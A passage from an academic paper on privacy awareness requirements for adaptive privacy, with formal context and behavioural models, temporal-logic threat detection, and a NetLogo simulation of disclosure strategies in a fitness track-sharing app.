is then presented in section III. Section IV describes the models that we use in our approach. Section V then presents PAR and the associated mechanisms used to derive monitoring and utility measures for adaptive privacy. Section VI focuses on experimental evaluation of our approach. Conclusions and further work are presented in section VII. II. RELATED WORK The core contribution of our research is to show that capturing privacy awareness requirements in software systems can be used to better engineer adaptive privacy. In this section, we present a review of related work in the area of adaptive privacy, privacy engineering and privacy awareness upon which we build our approach. A related notion of awareness requirements was described by Souza et al. [5] as a class of requirements that predicate the satisfaction of other requirements. Albeit not focused on privacy, the approach has been used [7] to specify the need for adaptation of software systems. In this paper we tailor the notion of awareness requirements, and propose the use of PAR for adaptive privacy. Adaptive privacy was introduced by Schaub et al. [9] as a system’s ability to preserve privacy in presence of context changes, by providing recommendations to the user or via automatic reconfiguration. This reconfiguration is essential since the boundary delimiting the decision of a user disclosing or withholding information changes with context [10]. Braghin et al. [11] used the concept of ambient to enforce privacy in a changing environment. This was achieved by using policies to define boundaries of information disclosure. Braghin et al. did not consider that changes in context may determine the need to change attributes that need to be monitored in the application, nor the notion of utility. Privacy engineering was described by Spiekermann and Cranor [6] as a systematic effort to embed privacy concerns into the design of an application. Following this principle, Kalloniatis et al. [12] proposed a methodology to build privacy-preserving applications. Similarly, Liu et al. [13] proposed a requirement-driven development methodology for secure and privacy-preserving applications based on the i* framework. Barth et al. [14] used the contextual integrity framework as a means to design privacy-preserving applications. Contextual integrity features a context model and a formal model that uses temporal logic to define the communication between two entities, and how the disclosure of information takes place. These methodologies and framework did not consider that the system can adapt during its lifetime, consequently the constructs for the satisfaction of privacy requirements can also change. Finally, Pötzsch [15] defines privacy awareness as an individual’s cognition of who, when, which, what amount, and how personal information about his/her activity is processed and utilised. Pötzsch’s view of privacy awareness helps to provide a set of constructs for building a context for which adaptive privacy can be assessed. An empirical study about the impact of this view of privacy awareness has been carried out [16]. However, privacy awareness constructs have not been investigated in adaptive privacy. We suggest that privacy awareness is critical to enable users and systems to gain sufficient knowledge about how to act in privacy sensitive situations. As they gain assurance that their privacy is broadly preserved and of the expected benefit of disclosure, they may consider forfeiting their privacy when engaging in some interactions. III. OVERALL APPROACH AND MOTIVATING EXAMPLE The objective for adaptive privacy is to enable applications to detect privacy threats with changing context, and subsequently carry out adaptation actions to ameliorate the consequences of the threat. Our approach to achieve this is based on the rationale that for useful adaptation to occur in software systems, there needs to be monitoring, analysis, planning and execution [8]. These activities enable software systems to detect at runtime the changes in the context and to appropriately react to them. As shown in Figure 1, we propose that adaptive privacy firstly mandates that systems should be able to identify attributes to monitor in order to detect privacy threats (monitoring). Secondly, when privacy threats are discovered, systems should have an understanding of the consequence of the threat (analysis). It is the ability of systems to satisfy their monitoring and analysis needs that we characterise as PAR. The satisfaction of this requirement serves as a useful input into the system’s ability to make informed decision on information disclosure (planning). Finally, based on disclosure decision, mitigation actions can be carried out to ameliorate the consequence of the threat (execution). Such mitigation actions can involve updating the behaviour of the system, changing the context of operations or users carrying out explicit mediation actions. In this paper, we focus on the first three phases of the MAPE loop to highlight the PAR for making useful disclosure decisions. Specifically, PAR are the requirements that need to be satisfied by a system in order to meaningfully adapt the privacy of its users as context changes. In this research, we demonstrate that the core of such requirements include: the ability of systems to identify attributes to monitor in order to detect privacy threats; the discovery of a privacy threat before information about a user is disclosed; and the severity of the threat as well as the benefit of information disclosure amidst the discovered threat. In this paper, we first highlight the models useful for satisfying PAR (Section IV), we then present an approach to PAR analysis based on these models (Section ![Figure 1 Adaptive privacy framework](https://example.com/adaptive-privacy-framework.png) Finally, we present an evaluation of the usefulness of PAR at the planning phase of adaptive privacy (section VI). We achieve our objective using an example involving a track sharing application for runners and other outdoor activities. Similar examples of such application include B.iCycle (http://b-icycle.com), MyTracks (mytracks.appspot.com), etc. Typically, such applications enable a group of users to share live GPS tracks and performance statistics with fellow users and other agents such as their fitness instructors and physicians. For this example, privacy management includes the capability of users to decide the limits of information disclosure to other users – about their current location, distance, age, heart rate, burned calories, weight loss, etc. Effective adaptive privacy requires users sharing their outdoor activity experience to understand information flows, weigh the consequences of sharing information, and make informed, context-specific decisions to disclose or withhold information. IV. MODELS FOR SATISFYING PAR As shown in figure 1, the three main models we use to enable the satisfaction of privacy awareness requirements include behavioural and context model, as well as a model representing user privacy requirements. We discuss each of these models in detail. A. Context Model A Context model is useful for identifying interactions that can occur between users, as well as the attributes of the users involved in achieving a common objective [17]. For adaptive privacy, context models represent attributes that are subsequently manipulated on by the software system in order to support the activity of the users as they interact with one another. The advantage of context models is their reuse for design of multiple systems. In this research, we formally define a context model as a tuple: \( CM = (D, Y, U, R, C) \). Where: \( D \) is a set of attributes; \( Y \) is a set of entities; \( U \) is a relation \( U: Y \times Y \), representing the association between entities; \( R \) is a relation \( R: D \times \mathcal{P}(D) \times 2^D \) between attributes, where \( \mathcal{P}(D) \) is the power set of \( D \), and \( C \) is a relation \( C: Y \times 2^D \) that associates entities to attributes. An instance of context model for the case study in Section III.B is shown in Figure 2. An entity in our model represents an object that can be described by a set of attributes. Attributes here are viewed as atomic variables that cannot be further decomposed. There are two kinds of entities: entities that characterise the environment of interaction (e.g. the Location entity, represented in light boxes in Figure 2), and entities representing roles of users in the system. As shown in the shaded boxes in Figure 2, we represent a set of users as agents. These agents interact to exchange information (attributes about an agent) with other agents. The agent responsible for sending the information is referred to as the Sender, while the receiving agent is the Receiver. The agent characterised by the sent information is the Subject. These interactions that occur between agents with a given role are modelled by the relation \( U \). This relation also expresses how other entities relate with each other (e.g. Track and a Location) or between agent and other entities (e.g. Subject and ActivityType). Attributes can relate with each other as modelled in the inference relation \( R \). Such inference relations are established rules that enable the deduction of previously unknown attribute from another disclosed attribute [17]. For example, the rule \( \text{LocCords} = \text{Ave.Speed} \cup \text{TrackName} \setminus \text{StartTime} \), infers that the location coordinates of a user can be inferred from the disclosure of the users average speed, track name and start time. Another example is the rule \( \text{BMI} = \text{Height} \cup \text{Weight} \). Finally, an entity is related to a set of attributes as expressed in the relation \( C \). An example in Figure 2 is the relation between the entity Location and the attributes LocCords, Trajectory, and LocName. Generally, our approach to modelling context is amenable to other forms of inferences based on transitive, Euclidian or symmetric relations. B. Behavioural Model A Behavioural model represents the different states that an agent can reach, and the transitions required to enter such state. Formally, a behavioural model is a tuple: \( B = (S, E, t) \). Where: \( S \) is a set of states; \( E \) is a set of events, where an event is defined by a tuple \( ((D^n)^s [y], a_s \{ \text{sent} \mid \text{received} \}) \). In that tuple, \( D^n \) is a set of cardinality \( n \), containing the attributes manipulated by the transition. The set \( D^n \) can be replaced by an entity that characterise the environment of interaction. The subject \( a_s \) identifies the agent, the event is referred to (i.e. an agent with type Subject), and \{sent|received\} expresses if the attributes are sent or received by the agent respectively. Finally, \( t \) is the state transition relation: \( t: S \times E \cup \{\} \rightarrow S \). The occurrence of a transition with an e-event (e-transition) means that the agent that the behaviour is referred to does not send or receive any attribute in that transition. An example of a behavioural model, represented as a Labelled Transition System (LTS), is shown in Figure 3. In Table 1, we illustrate the set of context attributes and the events associated to each transition of the LTS in Figure 3. For example, the transition \( t_4 \) in Table 1 from state 3 to 4 in Figure 3 is triggered by the event shareRaceResult. The attributes used by the event are shown in the right column of the table. These attributes are associated to the agent \( a_i \), which in our example is the subject. Finally the event features the \( \text{sent} \) keyword, indicating that \( t_4 \) sends the attributes in the event. Table 1 also features some \( \varepsilon \)-transitions that are signified by the representation \( \rightarrow \varepsilon \). Also note that there can be transitions not associated with context attributes (example \( t_8 \)). For detecting privacy threats we focus only on the information that the various agents in the system may exchange. Consequently we consider \( t_1, t_2, t_3 \) and \( t_4 \) as \( \varepsilon \)-transitions, since they do not send or receive any attribute. ![Figure 3 A behavioural model B1](image) **Table 1 Attributes associated with state transitions (t)** <table> <thead> <tr> <th>(i)</th> <th>Event</th> <th>Event ( \cup {z} )</th> </tr> </thead> <tbody> <tr> <td>( t_1 )</td> <td>establishGPSFix {LocCords, StartTime, ActivityType} ( \rightarrow \varepsilon )</td> <td></td> </tr> <tr> <td>( t_2 )</td> <td>recordTrack {CurrentTime, AveSpeed, LocCords} ( \rightarrow \varepsilon )</td> <td></td> </tr> <tr> <td>( t_3 )</td> <td>uploadTrack {AveSpeed, TrackName, LocCords, StartTime, EndTime} ( \rightarrow \varepsilon )</td> <td></td> </tr> <tr> <td>( t_4 )</td> <td>shareRaceResult {AveSpeed, TrackName, LocCords, StartTime, EndTime, Weight}, ( a_1 ), sent</td> <td></td> </tr> <tr> <td>( t_5 )</td> <td>sharePersonalInfo {Gender, Height, Age}, ( a_1 ), sent</td> <td></td> </tr> <tr> <td>( t_6 )</td> <td>requestUserTrack {SubjectName}, ( a_1 ), sent</td> <td></td> </tr> <tr> <td>( t_7 )</td> <td>viewUserTrack {AveSpeed, TrackName, StartTime, EndTime, LocCords, Weight, Height, Gender, Age}, ( a_1 ), sent</td> <td></td> </tr> <tr> <td>( t_8 )</td> <td>hibernate {} ( \rightarrow \varepsilon )</td> <td></td> </tr> </tbody> </table> **C. User Privacy Requirements** The User privacy requirements are individual expressions by agents to regulate the manner of information disclosure about their activity. We view the possible failure of a privacy requirement in a specific context as a privacy threat that triggers appropriate mitigation actions (see Section V.B). We build on the view presented in [10] where the privacy of a subject is conditioned by the subject’s (and other agents) past experiences and expectations of the future. In this way, we assume that privacy requirements are expressed as IF-THEN rules. The IF segment contains an event and the identity of its Sender or Receiver. If the event is a sent event, then a Receiver of the event is identified. Alternatively, if the event is a received event, then a Sender of the event is identified. The THEN part is a linear temporal logic (LTL) formula that captures the past experiences or future expectations of a subject by using past and future operators [18]. The LTL formula predicates about the values that attributes of the context model can assume, or the knowledge that can be gained by agents about a subject over time [19][20]. The formula, \( K_{a_1}d_{a_1} \) is a modal representation of knowledge [20] that the agent \( a_1 \) knows the value of the attribute \( d \) about a subject \( a_1 \). Examples of privacy requirements for the selective disclosure of a subject’s information can be stated as thus: **(PR1)** IF Location, \( a_2 \), received, \( a_2 \) THEN \( \Diamond_p\) \( \text{StartTime}_{ai} < 21.00 \ hours \). **(PR2)** IF Weight, \( a_1 \), sent, Receiver THEN \( \Box \neg K_{\text{Receiver}} BM_{ai} \). The symbols \( \Diamond_p \) and \( \Box \) are the LTL operators eventually in the past and globally respectively as defined in Table 2. \( PR_i \) is active if \( a_2 \) sends a specific Location attribute about the agent \( a_1 \). In that case, the subject should have started his race before 21.00 hours, at least once in the past. Similarly, \( PR_2 \) is active, if the Weight of \( a_1 \) is received by any Receiver, then \( \neg K_{\text{Receiver}} BM_{ai} \) (i.e. the Receiver does not know the BMI of \( a_1 \)) should hold globally (i.e. both in the past and in the future). **V. ANALYSING PAR** In this section, we describe different analysis used for the satisfaction of PAR based on models described in section IV. **A. Identifying Attributes to Monitor** For the satisfaction of PAR we first need to identify the attributes to monitor for the detection of privacy threats. We realise this by identifying the subset of attributes that are common to the context and behavioural model, and in the privacy requirement of the user. The identification process is composed of four steps: 1. For each privacy requirement \( PR_n \), a couple \( (d_x, \ a_i) \) or \( (y_x, \ a_i) \) present in the event of the IF segment is collected in a set \( M \). Where \( d_x \) and \( y_x \) identify an attributes or an entity referenced by the event in the IF part of \( PR_n \), and \( a_i \) is the subject in the event. 2. For each couple \( (y_x, \ a_i) \) in \( M \), the tuples \( c_{dx} \) contained in the relation \( C \) of the context model, and featuring \( y_x \) are selected. For each tuple \( c_{dx} \), \( C \), a new couple \( (d_x, \ a_i) \) is added to \( M \), where \( d_x \) is an attribute in \( c_{dx} \). Finally the couple \( (y_x, \ a_i) \) is removed from \( M \). 3. For each couple \( (d_x, \ a_i) \) in \( M \), the tuples \( r_{dx} \) contained in the relation \( R \) of the context model, and featuring \( d_x \) is selected. For each tuple \( r_{dx} \), a new couple \( (d_x, \ a_i) \) is added to \( M \), where \( d_x \) is an attribute in \( r_{dx} \). It is noted here that each \( d_x \) can also be part of some other tuples in the relation \( R \). In this case the step is repeated for those tuples. 4. Finally, for each couple \( (d_x, \ a_i) \) in \( M \), the behavioural model of the agent \( a_i \) is considered. The transitions in the transition relation \( r_{av} \) that are triggered by events associated to \( d_x \) are selected and associated to \( PR_n \). The output of these steps consists of the monitored attributes contained in the set \( M \), and the marked transitions in the behavioural model of an agent that operate on monitored attributes. These marked transitions identify where specifically in the behaviour of an agent the monitoring needs to occur. Considering PR1 in Section IV.C, the IF part of the requirement contains the event \((Location, a_1, \text{received})\). The first process step adds the couple \((Location, a_1)\) to the set \(M\). The second step considers those tuples in the relation \(C\) of the context model that include the \(Location\) entity. As shown in Figure 2, the tuples are \((Location, LocCords), (Location, Trajectory)\) and \((Location, LocName)\). The couples \((LocCords, a_1), (Trajectory, a_1),\) and \((LocName, a_1)\), are then added to \(M\). The third step considers the relation \(R\) in the context model and looks for attributes already in \(M\) also contained in a tuple in \(R\). For instance, as highlighted in section IV.A, the \(LocCords\) attribute is included in the tuple \((LocCords, Ave.Speed, TrackName, StartTime)\) of the relation \(R\). Thus, the couples \((Ave.Speed, a_1), (TrackName, a_1)\) and \((StartTime, a_1)\) are added to \(M\). The final step considers the transitions of the agent \(a_1\) as shown in Table 1. The transitions \(t_4\) and \(t_5\) are marked since they contain the attributes \(TrackName, LocCords\) and \(StartTime\). B. Privacy Threats Detection Privacy threats detection is aimed at discovering if an interaction between agents can result in the failure of a privacy requirement. We define an interaction as the exchange of information about a subject between a sender and a receiver. Given the set of monitored attributes and the associated transitions in agent behaviours, our approach analyses the interaction history of the system. The outcome ascertains the satisfaction or failure of a given privacy requirement in a moment of the system’s history. In this subsection, we first characterise an interaction between two agents, followed by how a sequence of such interactions can be used to describe a history of the system. Finally, we demonstrate the detection of privacy threats based on the defined history. 1) Characterising an interaction between two agents: An interaction is a single information-flow between two agents’ \(a_1\) and \(a_2\). Formally, such flow is defined as either of the following: i) a couple \((t_i, t_j)\), where \(t_i\) is a transition \((s_i, (d_{i,1}, d_{i,2}, ..., d_{i,n}, a_i, \text{sent}) s_j)\) belonging to the transition function of \(a_1\) and \(t_j\) is a tuple \((s_a, (d_{a,1}, d_{a,2}, ..., d_{a,n}, a_i, \text{received}) s_b)\) belonging to the transition function of \(a_2\); ii) two couples \((t_i, a), (t_j, a)\). The latter represents interactions where an agent sends information that is eventually received by a receiver in the system. We have assumed asynchronous interaction. It is possible that synchronous interaction can yield different behavioral runs and knowledge models. For example, assume that in a system there exist an agent \(a_1\) whose behavioural model is represented by \(B_1\) in Figure 3, and a second agent \(a_2\), whose behavioural model \(B_2\) is presented in Figure 4. The transition \(t_1\) in \(B_2\) is identical to the transition \(t_4\) in \(B_1\), and the transition \(t_{4Rec}\) features a receive events with the same attributes as the event in \(t_4\). Assuming the events in \(B_2\) and in \(B_3\) have the subject \(a_1\) (i.e., \(a_1\) is sending information about itself to \(a_2\)). Then the interaction between \(a_1\) and \(a_2\) is the tuple \((t_4_{a_1}; t_{4Rec}, a_2)\). 2) Defining the history of the system: A history of a system is a sequence of information-flows between agents in the system. The history keeps track in each time instant, of the predicates holding in that instant and the values of context attributes describing each subject. Formally, a history is defined as \(H = h_1, h_2, ..., h_p\). Each \(h_i \in [1, n]\) is a history step described by the sets \((\sigma, \nu, \pi)\), where \(\sigma = \{s_{a_1}, ..., s_{a_m}\}\) contains the states of the agents in the system in that history step, \(\nu\) contains the contextual attributes values for each agent and \(\pi\) contains the predicates that hold in \(h_i\). In \(H\), the transition from \(h_i\) to \(h_{i+1}\) signifies an interaction between two agents in the system. That interaction changes the states of the agents involved in the transition and can modify the predicates holding in the arrival state. Consider the partial history of a system involving interactions between a group of agents \(a_1, a_2\), and \(a_3\). An instance of that history is shown in Figure 5. The behaviour of \(a_1, a_2\) and \(a_3\) is as described in \(B_1, B_2\) and \(B_3\) of Figures 3 and 4 respectively. The behaviour of \(a_3\) features the transition \(t_{3Rec}\), which we assume identical to the one already introduced for \(a_2\), and the transition \(t_{3Rec}\) whose event has the same attributes as \(t_3\) in Table 1, but is a received event. In \(h_1\) of Figure 5, the agent \(a_1\) is in state \(B1(3)\) as a result of uploadTrack event, while \(a_2\) and \(a_3\) are in Idle states (i.e., \(B2(0)\) and \(B3(0)\) respectively). The interaction \((t_{4a_1}; t_{4Rec}, a_2)\) involving \(a_1\) disclosing its weight to \(a_2\), brings the history into \(h_2\). At this point, \(a_2\) knows the weight of \(a_1\) (i.e., \(K_{a_2}Weight(a_1)\)), since \(a_1\) has sent that attribute in \(t_{4a_1}\), and \(a_2\) has received it in \(t_{4Rec}, a_2\). At \(h_3\), \(a_2\) sends \(a_1\)'s Weight to \(a_3\) via interaction \((t_{4a_2}; t_{4Rec}, a_3)\). Consequently, the knowledge model (or what other agents know) about \(a_1\) is \(K_{a_2}Weight(a_1)\) and ![Figure 4 Behavioural models B2 and B3](image) Figure 4 Behavioural models B2 and B3. ![Figure 5 Example of a history of a system involving interactions between agents A1-A3, where A1 is the subject](image) Figure 5 Example of a history of a system involving interactions between agents A1-A3, where A1 is the subject. Finally, when the interaction \((t_3, a_1; t_5\text{Rec}, a_3)\), involving \(a_1\) disclosing its height to \(a_3\) occurs, then \(\Box_{\text{Rec}} \text{Height}_{a_3}\) hold. 3) Discovering privacy threats from a history of the system: Given a history and a privacy requirement, a privacy threat is detected if the LTL formula in the THEN segment of the privacy requirement is not verified in the history. Note that only privacy requirements for which the IF segment matches the event associated with an incumbent interaction are considered. The verification of a LTL formula on a finite history has been introduced in literature [18] [24]. In this research, we extend the semantics defined in [24] to introduce a three-valued logic. The semantics of our logic is given in Table 2. We assume the formula \(F\) on \(H\) is evaluated in the current step of history and denoted as \(H, i\). Defined semantics for our logic has the following rationale: I) if the evaluation of a formula in the current instant \(i\) of the history of the system offers enough evidences that a formula \(F\) will be true (respectively false) in all the possible continuations of the history, then the formula is true (respectively false); II) otherwise the evaluation of the formula is inconclusive, and the formula will be unknown. If the formula evaluated is true, then the privacy requirements are verified and the analysis detects no threat, in case the formula evaluated is false, then a privacy requirement is violated and the analysis consequently identifies a privacy threat. In case the formula evaluated is unknown then our analysis signals a potential privacy threat. This means that there are not enough evidences to conclude that the privacy requirements are violated. Such evidences can though be present in the following steps of the history. Consequently our analysis derives a new instance of the formula, scaled of one step in the future, and tries and verifies the new instance in the next history step. Consider the history shown in Figure 5, also assuming the other agents in the network have interacted with other agents as demonstrated in Figure 5. Here, an undirected and unweighted network is assumed. In this network, nodes are agents, while a link between nodes is a relation formed between an information sender and a receiver. Specifically, we determine the benefit of disclosure based on the clustering coefficient of the generated network, while the severity of the threat is determined based on the degree centrality of receiving agent. The clustering coefficient of an agent in a network is the ratio of the number of actual links between the agent’s neighbours and the possible number of links. The overall clustering coefficient of the network is then an average of the clustering coefficients of each agent in the network. Clustering coefficient typically describes the concentration of the neighbourhood of an agent in the network. Such concentration has been used as an indicator to show the extent to which an agent shares common properties and/or plays similar roles with other agents in the network [21]. For example, assuming \(a_1, a_2\) and \(a_3\) have interacted with other agents as demonstrated in Figure 6. The dotted link illustrates a scenario where the agent \(a_3\) is to disclose the attribute \(x\) to \(a_{R1}\) or \(a_{R2}\). The clustering --- ### Table 2 LTL semantics on the system history \(H\) <table> <thead> <tr> <th>Expression</th> <th>Semantics</th> </tr> </thead> <tbody> <tr> <td>(H, i \models F)</td> <td>(F) holds at the step (i) of (H)</td> </tr> <tr> <td>(H, i \models \text{LastTime } F)</td> <td>(F) holds at the step (i-1) of (H)</td> </tr> <tr> <td>(H, i \models \Diamond_j F)</td> <td>(\exists 1 \leq j \leq i) and (H, j \models F)</td> </tr> <tr> <td>(H, i \models \Box_j F)</td> <td>(\forall 1 \leq j \leq i) and (H, j \models F)</td> </tr> <tr> <td>(H, i \models \text{Next } F)</td> <td>Unknown and (H, i+1 \models F)</td> </tr> <tr> <td>(H, i \models \Diamond F)</td> <td>True if (H, i \models F); Otherwise (\text{Unknown and } H, i+1 \models \Diamond F)</td> </tr> <tr> <td>(H, i \models \Box F)</td> <td>False if (H, i \models F); Otherwise (\text{Unknown and } H, i+1 \models \Box F)</td> </tr> <tr> <td>(H, i \models \neg F)</td> <td>False if ((H, i \models F) \lor \exists 1 \leq j &lt; i) and (H, j \models F)</td> </tr> </tbody> </table> | \(\neg K_{\text{Receiver } \text{Weight}_{a_1}}\) or \(\neg K_{\text{Receiver } \text{Height}_{a_1}}\) | should hold, where \(\text{Receiver}\) identifies a generic agent receiving the information. If we assume that the interaction \((t_{3, a_1}; t_{3\text{Rec}, a_3})\) has not yet occurred, the predicate \(\Box_{\text{Rec}} \text{Weight}_{a_1}\) holds at \(h_3\). The information contained in the history up to \(h_3\) is not sufficient to demonstrate that \(PR_2\) will not hold in all the possible continuations of \(H\), so our analysis marks it as unknown and signals a potential threat. The analysis will also continue to check the formula in the future, until further evidences can bring it to a conclusion. Those evidences are provided in \(h_4\), where \(\Box_{\text{Rec}} \text{Height}_{a_1}\) holds. In that step there are enough evidences to conclude that the condition does not hold in any possible continuation of \(H\), and the analysis will consequently signal a privacy threat. --- ### Figure 6 Here, an undirected and unweighted network is assumed. In this network, nodes are agents, while a link between nodes is a relation formed between an information sender and a receiver. Specifically, we determine the benefit of disclosure based on the clustering coefficient of the generated network, while the severity of the threat is determined based on the degree centrality of receiving agent. coefficient of $a_i$ if the attribute $x$ is sent to the receiver $a_R$ is 0.5. Alternatively, the clustering coefficient if sent to $a_k$ is 0.3. Thus, using the clustering coefficient as a measure of benefit for the network in Figure 6, it will therefore be more beneficial if $a_i$ discloses $x$ to $a_R$ compared to $a_k$. The degree centrality of an agent describes the number of direct links that an agent has with other agents. Generally, it has been shown that an agent with higher degree centrality can gain access to and/or influence over others. Such agents can also serve as a source or conduit for larger volumes of information exchange with other agents [21]. Thus, a receiver with higher degree centrality stands a greater chance of disseminating inappropriately disclosed information to more agents, hence representing a higher threat severity. Using the illustration in Figure 6, the degree centrality for $a_R$ is 0.25 and hence it represents a lesser threat severity, compared to $a_k$ which is 0.5. Given that a potential privacy threat is distinguished from a privacy threat that can be proven from existing history, a damping factor is applied to the former. Such factor ensures that a potential privacy threat does not have equal measure of severity compared to a realised one. Overall, the utility of disclosure is then difference between benefit and threat severity. The utility of disclosure if $a_i$ discloses the attribute $x$ to $a_R$ is 0.25 while that of $a_k$ is -0.2. Thus, depending on a utility value, users or systems may consider disclosing or withholding specific information. In this manner, they are either forfeiting or reinforcing their privacy when engaging in some interactions. VI. EVALUATION OF PAR IN DISCLOSURE DECISION MAKING We conducted an evaluation to demonstrate if PAR can be a useful input to the planning part of adaptive privacy. One way of evaluating this outcome is to use specific adaptation strategies that regulate an acceptable utility, threat severity or benefit thresholds for a subject. The effectiveness of these strategies can then be checked for scenarios where the failure/satisfaction of PAR are realised. Table 3 illustrates the set of strategies used in this study. Case1 represents an agent that does not satisfy PAR. For this case, an agent initiates privacy management without an understanding of threat severity, benefit or the ultimate utility of disclosure. Case2 represents an agent satisfying PAR and triggering the adaptation action that terminates all interactions with other agents once the utility reaches the value 0. At this point, for $|H| > 0$, privacy threat severity ($TS$) equals benefit. Practically, Case2 represents an agent disassociating itself from a group objective because the benefit does not exceed the privacy threat resulting from information disclosure. For Case3, the agent satisfies PAR and triggers the adaptation action similar to Case2 once TS is greater than a specific threshold ($Th$). Practically, Case3 represents an agent disassociating itself from a group objective irrespective of the benefit derived, because a specific threat severity level is reached. Finally, Case4 is similar to Case3, but the adaptation action triggered is not to disclose information to other agents with specific properties. For this evaluation, the property we examine is the number of neighbours ($n$) of the receiving agent. Practically, Case2 is a strategy that does not stop the increase in threat severity, but curbs the rate at which the increase occurs, while still deriving some utility. Based on the four highlighted cases, we conduct an experimental study that evaluates the following research questions: RQ1: What is the difference between an agent that does not satisfy PAR (i.e. No-PAR) and an agent that does (i.e. With PAR)? To address this question, we consider Case1 (No-PAR) and Case2 (with PAR). RQ2: Is there any advantage that Case1 has over Case4 or vice-versa. Considering that Case3 and Case4 manipulate on varying $Th$ and $n$ values, the aim is to understand the impact of these variations on utility. Finally, RQ3 investigates the impact that the number of agents in a group has on the utilities of Case3 and Case4. A. Experimental Setup In this evaluation we used Netlogo [23] (a programmable modelling environment for simulating natural and social phenomena) to simulate interactions across nine groups of agents. The number of agents in each group ranged from 10-250. This choice was inspired by studies on the average number of links that an agent has with other agents in typical group networks where agents are human [25]. The behaviour of each agent is a variant of the behavioural model shown in Figure 3. During the simulation, multiple interactions can occur over a single link. Thus the actual number of links is less than the total number of simulated interactions. Each group had a single subject with multiple senders and receivers. Thus, every interaction either involved a subject sending information about itself, or another agent information sending information about the subject. Also, the simulation of interactions followed the power-law distribution, which is typical in group networks where a small number of agents have very large number of links. Our simulation of interactions and subsequent networks were tailored to closely resemble mobility based networks where links arise mainly from spatial or temporal proximity of agents. For each group, we associated $PR_i$ (Section IV.C) to the selected subject. We assumed a conservative scenario where every interaction resulted in a privacy threat. Furthermore, we fixed $Th = 0.12$, and evaluated Case1 for $Th$, $Th*2$, $Th*4$, $Th*6$, $Th*8$ and $Th*10$ respectively. Similarly, we fixed $n = 8$, and evaluated Case4 for $n$, $n+2$, $n+4$, $n+6$, $n+8$ and $n+10$ respectively. B. Findings and Lessons Learned The topology metrics for each group network based on the above experimental setup are shown in Table 4. $TS_{no-PAR}$ refers to privacy threat severity where PAR are not satisfied. The 2nd and 3rd columns show that the number of agents in a group increases with increasing links between agents. Similarly, the number of interactions required for privacy threat severity to reach 1 for a scenario where PAR are not satisfied, increases with the number of agents. This is because given the power-law and increasing the number of agents in a group, one would expect a decrease in the degree centrality of most receiving agents, and hence in the associated privacy threat severity. In the remaining of this subsection we used this result to address each of the designated research questions. While the results generated for the different groups were related, for space limitations, we show results for only group 7 in RQ1 and RQ2. In RQ3, we then demonstrate the impact of the number of agents in a group on the effectiveness of adaptation actions. Table 4 Simulated network topology metrics <table> <thead> <tr> <th>Group</th> <th>No. gents</th> <th>No. links</th> <th>No. Interactions (TS_{nepAR = 1})</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>10</td> <td>29</td> <td>58</td> </tr> <tr> <td>2</td> <td>25</td> <td>104</td> <td>238</td> </tr> <tr> <td>3</td> <td>50</td> <td>282</td> <td>697</td> </tr> <tr> <td>4</td> <td>75</td> <td>521</td> <td>1339</td> </tr> <tr> <td>5</td> <td>100</td> <td>788</td> <td>2065</td> </tr> <tr> <td>6</td> <td>125</td> <td>1095</td> <td>2911</td> </tr> <tr> <td>7</td> <td>150</td> <td>1441</td> <td>3874</td> </tr> <tr> <td>8</td> <td>200</td> <td>2189</td> <td>5968</td> </tr> <tr> <td>9</td> <td>250</td> <td>3170</td> <td>8611</td> </tr> </tbody> </table> 1) RQ1 findings: Figure 7 shows the plots of threat severity, benefit and utility for Case1 and Case2 for a subject in Group 7. In both cases, it can be seen that the benefit of information disclosure reaches a tipping point and gradually decreases thereafter. This outcome is explained considering that the more a subject engages in interactions and form new links with other agents, the less likely the neighbours of the subject will have links to each other. This results in a lower benefit measure. In contrast, given No-PAR for Case1, the threat severity continues to increase, with a continuous decrease in the utility. This continuous increase in severity results from the receiving agent having more neighbours with increasing interactions. For Case2 with PAR, as shown in Figure 7, the subject is able to curb the continuous increase in threat severity. In summary, the core distinction between an agent with PAR and No-PAR is that agents with PAR can regulate information disclosure. Such regulation is based on tolerable levels of threat severity or on the minimum expected utility. For Case2, this has been achieved by terminating all subsequent interactions at the point where utility reaches 0. However, terminating all subsequent interactions can be viewed as an extreme risk-averting behaviour which can hinder agents from reaping the benefit of disclosure. Thus, a more appropriate scenario falls somewhere between extreme cases of risk-taking and avverting. We investigate these scenarios in RQ2 with varying values of Th and n. 2) RQ2 findings: Figure 8 illustrates the impact of a subject terminating information disclosure to receiving agents with n neighbours in a group (Case2). It is noticed here that increasing n results in tending utility towards what we observed in the No-PAR case. Again, this outcome can be explained by the assumption of power-law distribution where a smaller number of receiving agents will have high n. Thus, at higher n values this adaptation action is less effective. The outcome for Case3 involving a different adaptation action is depicted in Figure 9. Here, all interactions are terminated when TS is more than a specified Th. For this case, the subject does not need to wait until utility = 0. As a result, the utility curves associated with the two lower thresholds (Th1 and Th2) outperform the utility of Case2. Similar to Case4 as Th values increase, the utility for the subject tends towards the No-PAR utility. To achieve a better understanding of the statistical significance of the results generated for varying Th and n values, we ran a non-parametric ANOVA test. The choice of non-parametric ANOVA was because the utility data of different cases did not have Normal distribution. Figure 10 shows the Box plots for the different utility function of Case1 - Case4. The Kruskal-Wallis test showed significant difference between these cases, but pair-wise comparison revealed that the three higher Th values for Case3 (i.e., Th2, Th3 and Th4) are not statistically different neither from No-PAR nor from each other. Conversely, Th1, Th2 and Th3 are statistically different from No-PAR and each other. This outcome suggests that for a risk-averting behaviour, Th1 is better than Th2 and Th3. Conversely, for a risk-taking behaviour, Th3 is the limit. Figure 8- Utility of terminating disclosure to agents with different number of links (n) – agents=150. (compared to $Th_2$, $Th_3$ and $Th_6$) for which if applied, then some benefit can be derived without being similar to No-PAR. Again, the two higher $n$ values for Case4 (i.e., $n_5$ and $n_6$) are not significantly different from neither No-PAR nor from each other. Conversely, $n_1 - n_4$ are statistically different from No-PAR as well as each other. This outcome suggests that for a risk-averting behaviour, $n_1$ is better than $n_2 - n_4$. Conversely, for a risk-taking behaviour, $n_6$ is the limit (compared to $n_5$ and $n_6$) for which if applied, then some benefit can be derived without reaching the No-PAR utility. In summary, for a risk-averting behaviour, it can be said that lower values of $Th$ or $n$ are better than higher values. In contrast, for a risk-taking behaviour, the intensity is for a subject to accommodate the decline in the utility and the increase in threat severity in order to leverage on the benefit. Then there is a limit to which such a subject can risk information disclosure, over which it is as good as the subject not satisfying PAR. **RQ3 findings:** Table 5 shows a comparison of Case1 and Case4 against No-PAR for different groups considered in this study. This table illustrates that for groups 1, 2 and 3 consisting of 10, 25 and 50 agents respectively, none of the adaptation actions in Case4 was significantly different from the No-PAR. From groups 4 to 9, the outcome showed a different trend of decreasing numbers of $n$ that was not significantly different from the 